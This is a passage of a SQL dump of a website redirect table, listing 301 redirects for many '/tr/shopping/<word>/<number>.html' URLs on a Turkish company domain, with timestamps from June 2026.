00:00:00',301),(74135,'https://3s-technologies.com.tr/tr/shopping/camleted/1295963414.html',NULL,'https://3s-technologies.com.tr/shopping/camleted/1295963414.html','',1,0,'2026-06-11 06:21:15','0000-00-00 00:00:00',301),(74136,'https://3s-technologies.com.tr/tr/shopping/compellation/2527941639.html',NULL,'https://3s-technologies.com.tr/shopping/compellation/2527941639.html','',1,0,'2026-06-11 06:21:25','0000-00-00 00:00:00',301),(74137,'https://3s-technologies.com.tr/tr/shopping/absorpt/1883767870.html',NULL,'https://3s-technologies.com.tr/shopping/absorpt/1883767870.html','',1,0,'2026-06-11 06:21:27','0000-00-00 00:00:00',301),(74138,'https://3s-technologies.com.tr/tr/shopping/cataphract/1419793682.html',NULL,'https://3s-technologies.com.tr/shopping/cataphract/1419793682.html','',1,0,'2026-06-11 06:21:30','0000-00-00 00:00:00',301),(74139,'https://3s-technologies.com.tr/tr/shopping/frivoler/3240580573.html',NULL,'https://3s-technologies.com.tr/shopping/frivoler/3240580573.html','',1,0,'2026-06-11 06:21:33','0000-00-00 00:00:00',301),(74140,'https://3s-technologies.com.tr/tr/shopping/pseudoneuropterous/1905104547.html',NULL,'https://3s-technologies.com.tr/shopping/pseudoneuropterous/1905104547.html','',1,0,'2026-06-11 06:21:36','0000-00-00 00:00:00',301),(74141,'https://3s-technologies.com.tr/tr/shopping/futhark/3282812516.html',NULL,'https://3s-technologies.com.tr/shopping/futhark/3282812516.html','',1,0,'2026-06-11 06:21:39','0000-00-00 00:00:00',301),(74142,'https://3s-technologies.com.tr/tr/shopping/armpit/1137214139.html',NULL,'https://3s-technologies.com.tr/shopping/armpit/1137214139.html','',1,0,'2026-06-11 06:21:42','0000-00-00 00:00:00',301),(74143,'https://3s-technologies.com.tr/tr/shopping/there/4270549078.html',NULL,'https://3s-technologies.com.tr/shopping/there/4270549078.html','',1,0,'2026-06-11 06:21:45','0000-00-00 00:00:00',301),(74144,'https://3s-technologies.com.tr/tr/shopping/cavillation/2869038082.html',NULL,'https://3s-technologies.com.tr/shopping/cavillation/2869038082.html','',1,0,'2026-06-11 06:21:48','0000-00-00 00:00:00',301),(74145,'https://3s-technologies.com.tr/tr/shopping/coryphee/1074694063.html',NULL,'https://3s-technologies.com.tr/shopping/coryphee/1074694063.html','',1,0,'2026-06-11 06:21:51','0000-00-00 00:00:00',301),(74146,'https://3s-technologies.com.tr/tr/shopping/citator/3899735108.html',NULL,'https://3s-technologies.com.tr/shopping/citator/3899735108.html','',1,0,'2026-06-11 06:21:54','0000-00-00 00:00:00',301),(74147,'https://3s-technologies.com.tr/tr/shopping/beemer/1360862280.html',NULL,'https://3s-technologies.com.tr/shopping/beemer/1360862280.html','',1,0,'2026-06-11 06:21:57','0000-00-00 00:00:00',301),(74148,'https://3s-technologies.com.tr/tr/shopping/cointense/2277597345.html',NULL,'https://3s-technologies.com.tr/shopping/cointense/2277597345.html','',1,0,'2026-06-11 06:22:00','0000-00-00 00:00:00',301),(74149,'https://3s-technologies.com.tr/tr/shopping/fatty/2894356414.html',NULL,'https://3s-technologies.com.tr/shopping/fatty/2894356414.html','',1,0,'2026-06-11 06:22:03','0000-00-00 00:00:00',301),(74150,'https://3s-technologies.com.tr/tr/shopping/conchifer/2213519812.html',NULL,'https://3s-technologies.com.tr/shopping/conchifer/2213519812.html','',1,0,'2026-06-11 06:22:06','0000-00-00 00:00:00',301),(74151,'https://3s-technologies.com.tr/tr/shopping/rebloom/4036773069.html',NULL,'https://3s-technologies.com.tr/shopping/rebloom/4036773069.html','',1,0,'2026-06-11 06:22:09','0000-00-00 00:00:00',301),(74152,'https://3s-technologies.com.tr/tr/shopping/pyralidae/1009819052.html',NULL,'https://3s-technologies.com.tr/shopping/pyralidae/1009819052.html','',1,0,'2026-06-11 06:22:12','0000-00-00 00:00:00',301),(74153,'https://3s-technologies.com.tr/tr/shopping/pseudemys/2401687189.html',NULL,'https://3s-technologies.com.tr/shopping/pseudemys/2401687189.html','',1,0,'2026-06-11 06:22:15','0000-00-00 00:00:00',301),(74154,'https://3s-technologies.com.tr/tr/shopping/pyrogen/2242378356.html',NULL,'https://3s-technologies.com.tr/shopping/pyrogen/2242378356.html','',1,0,'2026-06-11 06:22:18','0000-00-00 00:00:00',301),(74155,'https://3s-technologies.com.tr/tr/shopping/diphthongation/344700091.html',NULL,'https://3s-technologies.com.tr/shopping/diphthongation/344700091.html','',1,0,'2026-06-11 06:22:21','0000-00-00 00:00:00',301),(74156,'https://3s-technologies.com.tr/tr/shopping/vultur/1743085290.html',NULL,'https://3s-technologies.com.tr/shopping/vultur/1743085290.html','',1,0,'2026-06-11 06:22:26','0000-00-00 00:00:00',301),(74157,'https://3s-technologies.com.tr/tr/shopping/potator/1987241762.html',NULL,'https://3s-technologies.com.tr/shopping/potator/1987241762.html','',1,0,'2026-06-11 06:22:28','0000-00-00 00:00:00',301),(74158,'https://3s-technologies.com.tr/tr/shopping/ursula/1610970837.html',NULL,'https://3s-technologies.com.tr/shopping/ursula/1610970837.html','',1,0,'2026-06-11 06:22:31','0000-00-00 00:00:00',301),(74159,'https://3s-technologies.com.tr/tr/shopping/refulgence/2991915827.html',NULL,'https://3s-technologies.com.tr/shopping/refulgence/2991915827.html','',1,0,'2026-06-11 06:22:34','0000-00-00 00:00:00',301),(74160,'https://3s-technologies.com.tr/tr/shopping/serenely/3886639613.html',NULL,'https://3s-technologies.com.tr/shopping/serenely/3886639613.html','',1,0,'2026-06-11 06:22:37','0000-00-00 00:00:00',301),(74161,'https://3s-technologies.com.tr/tr/shopping/allure/1523547802.html',NULL,'https://3s-technologies.com.tr/shopping/allure/1523547802.html','',1,0,'2026-06-11 06:22:40','0000-00-00 00:00:00',301),(74162,'https://3s-technologies.com.tr/tr/shopping/thermotonus/3696661541.html',NULL,'https://3s-technologies.com.tr/shopping/thermotonus/3696661541.html','',1,0,'2026-06-11 06:22:43','0000-00-00 00:00:00',301),(74163,'https://3s-technologies.com.tr/tr/shopping/cordovan/3719504971.html',NULL,'https://3s-technologies.com.tr/shopping/cordovan/3719504971.html','',1,0,'2026-06-11 06:22:46','0000-00-00 00:00:00',301),(74164,'https://3s-technologies.com.tr/tr/shopping/convictiveness/3762239018.html',NULL,'https://3s-technologies.com.tr/shopping/convictiveness/3762239018.html','',1,0,'2026-06-11 06:22:49','0000-00-00 00:00:00',301),(74165,'https://3s-technologies.com.tr/tr/shopping/catalatic/2501245502.html',NULL,'https://3s-technologies.com.tr/shopping/catalatic/2501245502.html','',1,0,'2026-06-11 06:22:52','0000-00-00 00:00:00',301),(74166,'https://3s-technologies.com.tr/tr/shopping/plainsman/3579879289.html',NULL,'https://3s-technologies.com.tr/shopping/plainsman/3579879289.html','',1,0,'2026-06-11 06:22:55','0000-00-00 00:00:00',301),(74167,'https://3s-technologies.com.tr/tr/shopping/odynerus/4114780457.html',NULL,'https://3s-technologies.com.tr/shopping/odynerus/4114780457.html','',1,0,'2026-06-11 06:22:58','0000-00-00 00:00:00',301),(74168,'https://3s-technologies.com.tr/tr/shopping/basylous/2713365530.html',NULL,'https://3s-technologies.com.tr/shopping/basylous/2713365530.html','',1,0,'2026-06-11 06:23:01','0000-00-00 00:00:00',301),(74169,'https://3s-technologies.com.tr/tr/shopping/disposed/3814205896.html',NULL,'https://3s-technologies.com.tr/shopping/disposed/3814205896.html','',1,0,'2026-06-11 06:23:04','0000-00-00 00:00:00',301),(74170,'https://3s-technologies.com.tr/tr/shopping/glochidia/3019216946.html',NULL,'https://3s-technologies.com.tr/shopping/glochidia/3019216946.html','',1,0,'2026-06-11 06:23:07','0000-00-00 00:00:00',301),(74171,'https://3s-technologies.com.tr/tr/shopping/mesoscutum/1900515775.html',NULL,'https://3s-technologies.com.tr/shopping/mesoscutum/1900515775.html','',1,0,'2026-06-11 06:23:10','0000-00-00 00:00:00',301),(74172,'https://3s-technologies.com.tr/tr/shopping/zionistic/3968237906.html',NULL,'https://3s-technologies.com.tr/shopping/zionistic/3968237906.html','',1,0,'2026-06-11 06:23:13','0000-00-00 00:00:00',301),(74173,'https://3s-technologies.com.tr/tr/shopping/candellila/1753973192.html',NULL,'https://3s-technologies.com.tr/shopping/candellila/1753973192.html','',1,0,'2026-06-11 06:23:16','0000-00-00 00:00:00',301),(74174,'https://3s-technologies.com.tr/tr/shopping/dropsicalness/4132135511.html',NULL,'https://3s-technologies.com.tr/shopping/dropsicalness/4132135511.html','',1,0,'2026-06-11 06:23:19','0000-00-00 00:00:00',301),(74175,'https://3s-technologies.com.tr/tr/shopping/remissory/1736058596.html',NULL,'https://3s-technologies.com.tr/shopping/remissory/1736058596.html','',1,0,'2026-06-11 06:23:22','0000-00-00 00:00:00',301),(74176,'https://3s-technologies.com.tr/tr/shopping/erelong/2167911180.html',NULL,'https://3s-technologies.com.tr/shopping/erelong/2167911180.html','',1,0,'2026-06-11 06:23:27','0000-00-00 00:00:00',301),(74177,'https://3s-technologies.com.tr/tr/shopping/impetrable/2022181437.html',NULL,'https://3s-technologies.com.tr/shopping/impetrable/2022181437.html','',1,0,'2026-06-11 06:23:28','0000-00-00 00:00:00',301),(74178,'https://3s-technologies.com.tr/tr/shopping/soldierly/1167284782.html',NULL,'https://3s-technologies.com.tr/shopping/soldierly/1167284782.html','',1,0,'2026-06-11 06:23:31','0000-00-00 00:00:00',301),(74179,'https://3s-technologies.com.tr/tr/shopping/outofbounds/802755277.html',NULL,'https://3s-technologies.com.tr/shopping/outofbounds/802755277.html','',1,0,'2026-06-11 06:23:34','0000-00-00 00:00:00',301),(74180,'https://3s-technologies.com.tr/tr/shopping/emetical/4235493644.html',NULL,'https://3s-technologies.com.tr/shopping/emetical/4235493644.html','',1,0,'2026-06-11 06:23:38','0000-00-00 00:00:00',301),(74181,'https://3s-technologies.com.tr/tr/shopping/wobble/1879179066.html',NULL,'https://3s-technologies.com.tr/shopping/wobble/1879179066.html','',1,0,'2026-06-11 06:23:40','0000-00-00 00:00:00',301),(74182,'https://3s-technologies.com.tr/tr/shopping/whomsoever/2848142816.html',NULL,'https://3s-technologies.com.tr/shopping/whomsoever/2848142816.html','',1,0,'2026-06-11 06:23:44','0000-00-00 00:00:00',301),(74183,'https://3s-technologies.com.tr/tr/shopping/suricat/3957339350.html',NULL,'https://3s-technologies.com.tr/shopping/suricat/3957339350.html','',1,0,'2026-06-11 06:23:47','0000-00-00 00:00:00',301),(74184,'https://3s-technologies.com.tr/tr/shopping/nuptial/1585066925.html',NULL,'https://3s-technologies.com.tr/shopping/nuptial/1585066925.html','',1,0,'2026-06-11 06:23:50','0000-00-00 00:00:00',301),(74185,'https://3s-technologies.com.tr/tr/shopping/cassandra/1911068973.html',NULL,'https://3s-technologies.com.tr/shopping/cassandra/1911068973.html','',1,0,'2026-06-11 06:23:52','0000-00-00 00:00:00',301),(74186,'https://3s-technologies.com.tr/tr/shopping/tattoo/3472191992.html',NULL,'https://3s-technologies.com.tr/shopping/tattoo/3472191992.html','',1,0,'2026-06-11 06:23:56','0000-00-00 00:00:00',301),(74187,'https://3s-technologies.com.tr/tr/shopping/jackatapinch/2310913535.html',NULL,'https://3s-technologies.com.tr/shopping/jackatapinch/2310913535.html','',1,0,'2026-06-11 06:23:59','0000-00-00 00:00:00',301),(74188,'https://3s-technologies.com.tr/tr/shopping/dogstail/2548066233.html',NULL,'https://3s-technologies.com.tr/shopping/dogstail/2548066233.html','',1,0,'2026-06-11 06:24:01','0000-00-00 00:00:00',301),(74189,'https://3s-technologies.com.tr/tr/shopping/foursquare/1971606262.html',NULL,'https://3s-technologies.com.tr/shopping/foursquare/1971606262.html','',1,0,'2026-06-11 06:24:05','0000-00-00 00:00:00',301),(74190,'https://3s-technologies.com.tr/tr/shopping/oncost/2124720388.html',NULL,'https://3s-technologies.com.tr/shopping/oncost/2124720388.html','',1,0,'2026-06-11 06:24:08','0000-00-00 00:00:00',301),(74191,'https://3s-technologies.com.tr/tr/shopping/groundcover/2521846146.html',NULL,'https://3s-technologies.com.tr/shopping/groundcover/2521846146.html','',1,0,'2026-06-11 06:24:11','0000-00-00 00:00:00',301),(74192,'https://3s-technologies.com.tr/tr/shopping/invected/4160648713.html',NULL,'https://3s-technologies.com.tr/shopping/invected/4160648713.html','',1,0,'2026-06-11 06:24:18','0000-00-00 00:00:00',301),(74193,'https://3s-technologies.com.tr/tr/shopping/cambistry/175426913.html',NULL,'https://3s-technologies.com.tr/shopping/cambistry/175426913.html','',1,0,'2026-06-11 06:24:20','0000-00-00 00:00:00',301),(74194,'https://3s-technologies.com.tr/tr/shopping/remunerate/2668519796.html',NULL,'https://3s-technologies.com.tr/shopping/remunerate/2668519796.html','',1,0,'2026-06-11 06:24:23','0000-00-00 00:00:00',301),(74195,'https://3s-technologies.com.tr/tr/shopping/lupulin/2763119356.html',NULL,'https://3s-technologies.com.tr/shopping/lupulin/2763119356.html','',1,0,'2026-06-11 06:24:26','0000-00-00 00:00:00',301),(74196,'https://3s-technologies.com.tr/tr/shopping/littler/2071589905.html',NULL,'https://3s-technologies.com.tr/shopping/littler/2071589905.html','',1,0,'2026-06-11 06:24:29','0000-00-00 00:00:00',301),(74197,'https://3s-technologies.com.tr/tr/shopping/pedobaptist/3778069446.html',NULL,'https://3s-technologies.com.tr/shopping/pedobaptist/3778069446.html','',1,0,'2026-06-11 06:24:32','0000-00-00 00:00:00',301),(74198,'https://3s-technologies.com.tr/tr/shopping/woven/1906316646.html',NULL,'https://3s-technologies.com.tr/shopping/woven/1906316646.html','',1,0,'2026-06-11 06:24:35','0000-00-00 00:00:00',301),(74199,'https://3s-technologies.com.tr/tr/shopping/lutulent/4183315620.html',NULL,'https://3s-technologies.com.tr/shopping/lutulent/4183315620.html','',1,0,'2026-06-11 06:24:38','0000-00-00 00:00:00',301),(74200,'https://3s-technologies.com.tr/tr/shopping/anthemis/1533052424.html',NULL,'https://3s-technologies.com.tr/shopping/anthemis/1533052424.html','',1,0,'2026-06-11 06:24:41','0000-00-00 00:00:00',301),(74201,'https://3s-technologies.com.tr/tr/shopping/flounce/2430154983.html',NULL,'https://3s-technologies.com.tr/shopping/flounce/2430154983.html','',1,0,'2026-06-11 06:24:44','0000-00-00 00:00:00',301),(74202,'https://3s-technologies.com.tr/tr/shopping/fraseri/716292491.html',NULL,'https://3s-technologies.com.tr/shopping/fraseri/716292491.html','',1,0,'2026-06-11 06:24:47','0000-00-00 00:00:00',301),(74203,'https://3s-technologies.com.tr/tr/shopping/orthodox/2561161760.html',NULL,'https://3s-technologies.com.tr/shopping/orthodox/2561161760.html','',1,0,'2026-06-11 06:24:50','0000-00-00 00:00:00',301),(74204,'https://3s-technologies.com.tr/tr/shopping/platy/243929695.html',NULL,'https://3s-technologies.com.tr/shopping/platy/243929695.html','',1,0,'2026-06-11 06:24:55','0000-00-00 00:00:00',301),(74205,'https://3s-technologies.com.tr/tr/shopping/whelped/3707214739.html',NULL,'https://3s-technologies.com.tr/shopping/whelped/3707214739.html','',1,0,'2026-06-11 06:24:57','0000-00-00 00:00:00',301),(74206,'https://3s-technologies.com.tr/tr/shopping/incuriously/274985194.html',NULL,'https://3s-technologies.com.tr/shopping/incuriously/274985194.html','',1,0,'2026-06-11 06:25:00','0000-00-00 00:00:00',301),(74207,'https://3s-technologies.com.tr/tr/shopping/chaldaism/3241792672.html',NULL,'https://3s-technologies.com.tr/shopping/chaldaism/3241792672.html','',1,0,'2026-06-11 06:25:03','0000-00-00 00:00:00',301),(74208,'https://3s-technologies.com.tr/tr/shopping/winnard/4276513504.html',NULL,'https://3s-technologies.com.tr/shopping/winnard/4276513504.html','',1,0,'2026-06-11 06:25:06','0000-00-00 00:00:00',301),(74209,'https://3s-technologies.com.tr/tr/shopping/slipcoat/3025363159.html',NULL,'https://3s-technologies.com.tr/shopping/slipcoat/3025363159.html','',1,0,'2026-06-11 06:25:09','0000-00-00 00:00:00',301),(74210,'https://3s-technologies.com.tr/tr/shopping/jouster/3773317151.html',NULL,'https://3s-technologies.com.tr/shopping/jouster/3773317151.html','',1,0,'2026-06-11 06:25:12','0000-00-00 00:00:00',301),(74211,'https://3s-technologies.com.tr/tr/shopping/greaseball/3827659733.html',NULL,'https://3s-technologies.com.tr/shopping/greaseball/3827659733.html','',1,0,'2026-06-11 06:25:15','0000-00-00 00:00:00',301),(74212,'https://3s-technologies.com.tr/tr/shopping/charterist/1850547749.html',NULL,'https://3s-technologies.com.tr/shopping/charterist/1850547749.html','',1,0,'2026-06-11 06:25:18','0000-00-00 00:00:00',301),(74213,'https://3s-technologies.com.tr/tr/shopping/sepsis/473542246.html',NULL,'https://3s-technologies.com.tr/shopping/sepsis/473542246.html','',1,0,'2026-06-11 06:25:21','0000-00-00 00:00:00',301),(74214,'https://3s-technologies.com.tr/tr/shopping/encircled/4159436614.html',NULL,'https://3s-technologies.com.tr/shopping/encircled/4159436614.html','',1,0,'2026-06-11 06:25:24','0000-00-00 00:00:00',301),(74215,'https://3s-technologies.com.tr/tr/shopping/roadway/1481315843.html',NULL,'https://3s-technologies.com.tr/shopping/roadway/1481315843.html','',1,0,'2026-06-11 06:25:27','0000-00-00 00:00:00',301),(74216,'https://3s-technologies.com.tr/tr/shopping/gimleted/2726131796.html',NULL,'https://3s-technologies.com.tr/shopping/gimleted/2726131796.html','',1,0,'2026-06-11 06:25:30','0000-00-00 00:00:00',301),(74217,'https://3s-technologies.com.tr/tr/shopping/liveries/4134723248.html',NULL,'https://3s-technologies.com.tr/shopping/liveries/4134723248.html','',1,0,'2026-06-11 06:25:33','0000-00-00 00:00:00',301),(74218,'https://3s-technologies.com.tr/tr/shopping/dehors/2101400940.html',NULL,'https://3s-technologies.com.tr/shopping/dehors/2101400940.html','',1,0,'2026-06-11 06:25:36','0000-00-00 00:00:00',301),(74219,'https://3s-technologies.com.tr/tr/shopping/lighthaired/2185266218.html',NULL,'https://3s-technologies.com.tr/shopping/lighthaired/2185266218.html','',1,0,'2026-06-11 06:25:39','0000-00-00 00:00:00',301),(74220,'https://3s-technologies.com.tr/tr/shopping/connusor/2291741416.html',NULL,'https://3s-technologies.com.tr/shopping/connusor/2291741416.html','',1,0,'2026-06-11 06:25:43','0000-00-00 00:00:00',301),(74221,'https://3s-technologies.com.tr/tr/shopping/amygdalus/1216647842.html',NULL,'https://3s-technologies.com.tr/shopping/amygdalus/1216647842.html','',1,0,'2026-06-11 06:25:46','0000-00-00 00:00:00',301),(74222,'https://3s-technologies.com.tr/tr/shopping/concubinage/4117204671.html',NULL,'https://3s-technologies.com.tr/shopping/concubinage/4117204671.html','',1,0,'2026-06-11 06:25:49','0000-00-00 00:00:00',301),(74223,'https://3s-technologies.com.tr/tr/shopping/disdiaclast/698773898.html',NULL,'https://3s-technologies.com.tr/shopping/disdiaclast/698773898.html','',1,0,'2026-06-11 06:25:52','0000-00-00 00:00:00',301),(74224,'https://3s-technologies.com.tr/tr/shopping/durante/3718292856.html',NULL,'https://3s-technologies.com.tr/shopping/durante/3718292856.html','',1,0,'2026-06-11 06:25:55','0000-00-00 00:00:00',301),(74225,'https://3s-technologies.com.tr/tr/shopping/volitans/1463401263.html',NULL,'https://3s-technologies.com.tr/shopping/volitans/1463401263.html','',1,0,'2026-06-11 06:25:58','0000-00-00 00:00:00',301),(74226,'https://3s-technologies.com.tr/tr/shopping/brompton/2779703722.html',NULL,'https://3s-technologies.com.tr/shopping/brompton/2779703722.html','',1,0,'2026-06-11 06:26:01','0000-00-00 00:00:00',301),(74227,'https://3s-technologies.com.tr/tr/shopping/unestablish/2898945202.html',NULL,'https://3s-technologies.com.tr/shopping/unestablish/2898945202.html','',1,0,'2026-06-11 06:26:04','0000-00-00 00:00:00',301),(74228,'https://3s-technologies.com.tr/tr/shopping/besoms/3098487110.html',NULL,'https://3s-technologies.com.tr/shopping/besoms/3098487110.html','',1,0,'2026-06-11 06:26:07','0000-00-00 00:00:00',301),(74229,'https://3s-technologies.com.tr/tr/shopping/gange/4238870333.html',NULL,'https://3s-technologies.com.tr/shopping/gange/4238870333.html','',1,0,'2026-06-11 06:26:10','0000-00-00 00:00:00',301),(74230,'https://3s-technologies.com.tr/tr/shopping/ribband/1009655513.html',NULL,'https://3s-technologies.com.tr/shopping/ribband/1009655513.html','',1,0,'2026-06-11 06:26:13','0000-00-00 00:00:00',301),(74231,'https://3s-technologies.com.tr/tr/shopping/shrillest/2654359628.html',NULL,'https://3s-technologies.com.tr/shopping/shrillest/2654359628.html','',1,0,'2026-06-11 06:26:16','0000-00-00 00:00:00',301),(74232,'https://3s-technologies.com.tr/tr/shopping/birgus/3702757050.html',NULL,'https://3s-technologies.com.tr/shopping/birgus/3702757050.html','',1,0,'2026-06-11 06:26:18','0000-00-00 00:00:00',301),(74233,'https://3s-technologies.com.tr/tr/shopping/overgarment/3382370829.html',NULL,'https://3s-technologies.com.tr/shopping/overgarment/3382370829.html','',1,0,'2026-06-11 06:26:22','0000-00-00 00:00:00',301),(74234,'https://3s-technologies.com.tr/tr/shopping/arthrology/1050838912.html',NULL,'https://3s-technologies.com.tr/shopping/arthrology/1050838912.html','',1,0,'2026-06-11 06:26:25','0000-00-00 00:00:00',301),(74235,'https://3s-technologies.com.tr/tr/shopping/sepalody/3451296726.html',NULL,'https://3s-technologies.com.tr/shopping/sepalody/3451296726.html','',1,0,'2026-06-11 06:26:28','0000-00-00 00:00:00',301),(74236,'https://3s-technologies.com.tr/tr/shopping/acroteria/3139670509.html',NULL,'https://3s-technologies.com.tr/shopping/acroteria/3139670509.html','',1,0,'2026-06-11 06:26:30','0000-00-00 00:00:00',301),(74237,'https://3s-technologies.com.tr/tr/shopping/vitality/3087933912.html',NULL,'https://3s-technologies.com.tr/shopping/vitality/3087933912.html','',1,0,'2026-06-11 06:26:34','0000-00-00 00:00:00',301),(74238,'https://3s-technologies.com.tr/tr/shopping/wreckful/2186218709.html',NULL,'https://3s-technologies.com.tr/shopping/wreckful/2186218709.html','',1,0,'2026-06-11 06:26:37','0000-00-00 00:00:00',301),(74239,'https://3s-technologies.com.tr/tr/shopping/melophagus/3405690277.html',NULL,'https://3s-technologies.com.tr/shopping/melophagus/3405690277.html','',1,0,'2026-06-11 06:26:40','0000-00-00 00:00:00',301),(74240,'https://3s-technologies.com.tr/tr/shopping/egocentrism/174051291.html',NULL,'https://3s-technologies.com.tr/shopping/egocentrism/174051291.html','',1,0,'2026-06-11 06:26:43','0000-00-00 00:00:00',301),(74241,'https://3s-technologies.com.tr/tr/shopping/xenia/2524564950.html',NULL,'https://3s-technologies.com.tr/shopping/xenia/2524564950.html','',1,0,'2026-06-11 06:26:46','0000-00-00 00:00:00',301),(74242,'https://3s-technologies.com.tr/tr/shopping/breviaries/2550608562.html',NULL,'https://3s-technologies.com.tr/shopping/breviaries/2550608562.html','',1,0,'2026-06-11 06:26:49','0000-00-00 00:00:00',301),(74243,'https://3s-technologies.com.tr/tr/shopping/piffero/269020800.html',NULL,'https://3s-technologies.com.tr/shopping/piffero/269020800.html','',1,0,'2026-06-11 06:26:53','0000-00-00 00:00:00',301),(74244,'https://3s-technologies.com.tr/tr/shopping/diabolo/534686716.html',NULL,'https://3s-technologies.com.tr/shopping/diabolo/534686716.html','',1,0,'2026-06-11 06:26:56','0000-00-00 00:00:00',301),(74245,'https://3s-technologies.com.tr/tr/shopping/welting/3400970390.html',NULL,'https://3s-technologies.com.tr/shopping/welting/3400970390.html','',1,0,'2026-06-11 06:26:58','0000-00-00 00:00:00',301),(74246,'https://3s-technologies.com.tr/tr/shopping/colobus/1263632112.html',NULL,'https://3s-technologies.com.tr/shopping/colobus/1263632112.html','',1,0,'2026-06-11 06:27:02','0000-00-00 00:00:00',301),(74247,'https://3s-technologies.com.tr/tr/shopping/confessionist/3823546995.html',NULL,'https://3s-technologies.com.tr/shopping/confessionist/3823546995.html','',1,0,'2026-06-11 06:27:05','0000-00-00 00:00:00',301),(74248,'https://3s-technologies.com.tr/tr/shopping/tetrodont/699854914.html',NULL,'https://3s-technologies.com.tr/shopping/tetrodont/699854914.html','',1,0,'2026-06-11 06:27:08','0000-00-00 00:00:00',301),(74249,'https://3s-technologies.com.tr/tr/shopping/haematopus/3357657431.html',NULL,'https://3s-technologies.com.tr/shopping/haematopus/3357657431.html','',1,0,'2026-06-11 06:27:13','0000-00-00 00:00:00',301),(74250,'https://3s-technologies.com.tr/tr/shopping/veretillum/3399889406.html',NULL,'https://3s-technologies.com.tr/shopping/veretillum/3399889406.html','',1,0,'2026-06-11 06:27:16','0000-00-00 00:00:00',301),(74251,'https://3s-technologies.com.tr/tr/shopping/blossomed/3813124912.html',NULL,'https://3s-technologies.com.tr/shopping/blossomed/3813124912.html','',1,0,'2026-06-11 06:27:19','0000-00-00 00:00:00',301),(74252,'https://3s-technologies.com.tr/tr/shopping/pandanales/2486921779.html',NULL,'https://3s-technologies.com.tr/shopping/pandanales/2486921779.html','',1,0,'2026-06-11 06:27:22','0000-00-00 00:00:00',301),(74253,'https://3s-technologies.com.tr/tr/shopping/replevied/419199664.html',NULL,'https://3s-technologies.com.tr/shopping/replevied/419199664.html','',1,0,'2026-06-11 06:27:25','0000-00-00 00:00:00',301),(74254,'https://3s-technologies.com.tr/tr/shopping/flammeolus/267854109.html',NULL,'https://3s-technologies.com.tr/shopping/flammeolus/267854109.html','',1,0,'2026-06-11 06:27:28','0000-00-00 00:00:00',301),(74255,'https://3s-technologies.com.tr/tr/shopping/entomostraca/427328648.html',NULL,'https://3s-technologies.com.tr/shopping/entomostraca/427328648.html','',1,0,'2026-06-11 06:27:31','0000-00-00 00:00:00',301),(74256,'https://3s-technologies.com.tr/tr/shopping/iliad/1080658457.html',NULL,'https://3s-technologies.com.tr/shopping/iliad/1080658457.html','',1,0,'2026-06-11 06:27:34','0000-00-00 00:00:00',301),(74257,'https://3s-technologies.com.tr/tr/shopping/wardmote/2784456049.html',NULL,'https://3s-technologies.com.tr/shopping/wardmote/2784456049.html','',1,0,'2026-06-11 06:27:37','0000-00-00 00:00:00',301),(74258,'https://3s-technologies.com.tr/tr/shopping/grallatores/1332394486.html',NULL,'https://3s-technologies.com.tr/shopping/grallatores/1332394486.html','',1,0,'2026-06-11 06:27:40','0000-00-00 00:00:00',301),(74259,'https://3s-technologies.com.tr/tr/shopping/bromogelatin/2987163532.html',NULL,'https://3s-technologies.com.tr/shopping/bromogelatin/2987163532.html','',1,0,'2026-06-11 06:27:43','0000-00-00 00:00:00',301),(74260,'https://3s-technologies.com.tr/tr/shopping/poisonousness/1345490013.html',NULL,'https://3s-technologies.com.tr/shopping/poisonousness/1345490013.html','',1,0,'2026-06-11 06:27:46','0000-00-00 00:00:00',301),(74261,'https://3s-technologies.com.tr/tr/shopping/wheezing/1745138180.html',NULL,'https://3s-technologies.com.tr/shopping/wheezing/1745138180.html','',1,0,'2026-06-11 06:27:52','0000-00-00 00:00:00',301),(74262,'https://3s-technologies.com.tr/tr/shopping/teaching/3797372983.html',NULL,'https://3s-technologies.com.tr/shopping/teaching/3797372983.html','',1,0,'2026-06-11 06:27:55','0000-00-00 00:00:00',301),(74263,'https://3s-technologies.com.tr/tr/shopping/commentaries/783086416.html',NULL,'https://3s-technologies.com.tr/shopping/commentaries/783086416.html','',1,0,'2026-06-11 06:27:59','0000-00-00 00:00:00',301),(74264,'https://3s-technologies.com.tr/tr/shopping/argentinian/98447795.html',NULL,'https://3s-technologies.com.tr/shopping/argentinian/98447795.html','',1,0,'2026-06-11 06:28:01','0000-00-00 00:00:00',301),(74265,'https://3s-technologies.com.tr/tr/shopping/forwhy/651966470.html',NULL,'https://3s-technologies.com.tr/shopping/forwhy/651966470.html','',1,0,'2026-06-11 06:28:04','0000-00-00 00:00:00',301),(74266,'https://3s-technologies.com.tr/tr/shopping/faultless/3967741148.html',NULL,'https://3s-technologies.com.tr/shopping/faultless/3967741148.html','',1,0,'2026-06-11 06:28:07','0000-00-00 00:00:00',301),(74267,'https://3s-technologies.com.tr/tr/shopping/racktail/288698990.html',NULL,'https://3s-technologies.com.tr/shopping/racktail/288698990.html','',1,0,'2026-06-11 06:28:10','0000-00-00 00:00:00',301),(74268,'https://3s-technologies.com.tr/tr/shopping/singularities/26308732.html',NULL,'https://3s-technologies.com.tr/shopping/singularities/26308732.html','',1,0,'2026-06-11 06:28:13','0000-00-00 00:00:00',301),(74269,'https://3s-technologies.com.tr/tr/shopping/insectation/1075313303.html',NULL,'https://3s-technologies.com.tr/shopping/insectation/1075313303.html','',1,0,'2026-06-11 06:28:17','0000-00-00 00:00:00',301),(74270,'https://3s-technologies.com.tr/tr/shopping/dreadlessness/440831314.html',NULL,'https://3s-technologies.com.tr/shopping/dreadlessness/440831314.html','',1,0,'2026-06-11 06:28:19','0000-00-00 00:00:00',301),(74271,'https://3s-technologies.com.tr/tr/shopping/ustulate/3335726924.html',NULL,'https://3s-technologies.com.tr/shopping/ustulate/3335726924.html','',1,0,'2026-06-11 06:28:23','0000-00-00 00:00:00',301),(74272,'https://3s-technologies.com.tr/tr/shopping/internecinal/1657575477.html',NULL,'https://3s-technologies.com.tr/shopping/internecinal/1657575477.html','',1,0,'2026-06-11 06:28:26','0000-00-00 00:00:00',301),(74273,'https://3s-technologies.com.tr/tr/shopping/flocculated/417231199.html',NULL,'https://3s-technologies.com.tr/shopping/flocculated/417231199.html','',1,0,'2026-06-11 06:28:29','0000-00-00 00:00:00',301),(74274,'https://3s-technologies.com.tr/tr/shopping/electrition/3901520068.html',NULL,'https://3s-technologies.com.tr/shopping/electrition/3901520068.html','',1,0,'2026-06-11 06:28:32','0000-00-00 00:00:00',301),(74275,'https://3s-technologies.com.tr/tr/shopping/ventuse/409152537.html',NULL,'https://3s-technologies.com.tr/shopping/ventuse/409152537.html','',1,0,'2026-06-11 06:28:34','0000-00-00 